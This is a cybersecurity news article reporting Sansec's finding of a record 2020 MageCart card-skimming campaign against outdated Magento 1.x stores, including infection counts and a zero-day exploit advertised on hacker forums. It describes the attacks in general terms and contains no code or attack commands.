Renowned information security expert and founder of Sanguine Security (SanSec) Willem de Groot warned about the largest ever campaign to compromise online stores powered by the Magento e-commerce platform. According to the expert, this is the largest attack since 2015.
“Last Friday, 10 stores were infected, then 1058 on Saturday, 603 on Sunday, and 233 more today,” de Groot wrote on Monday, September 14, 2020. “This automated campaign is the largest ever detected by Sansec since the start of observations in 2015. Previous record – 962 hacked stores in one day in July last year. "
All of these attacks were typical of MageCart hackers: the attackers hacked into websites and injected malicious scripts into their code, recording and stealing bank card data of users that they entered during ordering.
Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to introduce web skimmers (malicious code) on the pages of online stores to steal card data. But this approach was so successful that the group soon had numerous imitators, and the name MageCart became a household name, and now they denote a whole class of such attacks.
SanSec experts write that most of the hacked sites were using the outdated version 1.x Magento, whose support was finally discontinued on June 30, 2020. Interestingly, last year cybersecurity experts predicted growth of attacks on Magento 1.x, fearing that in the end 200,000 to 240,000 resources may be vulnerable. Fortunately, the number of vulnerable sites has decreased since then, and currently it is about 95,000.
ZDNet also recalls that this summer, some information security specialists expressed concern due to the fact that new vulnerabilities in Magento 1.x have not been discovered for a long time. The fact is that this is a very uncharacteristic picture, since the 1.x branch has long been considered old and full of holes. Experts feared that the hackers were deliberately "holding back" their Magento 1.x exploits and waited until the end of the support period to make sure that the Adobe developers did not fix the vulnerabilities. It looks like these experts were right.
While SanSec analysts have yet to establish exactly how the hackers hacked the affected sites, Willem de Groot writes that an advertisement for a zero-day vulnerability in Magento 1.x appeared on hacker forums last month, also confirming that the hackers were biding their time. In the ad, someone named z3r0day offered an RCE exploit for $ 5,000.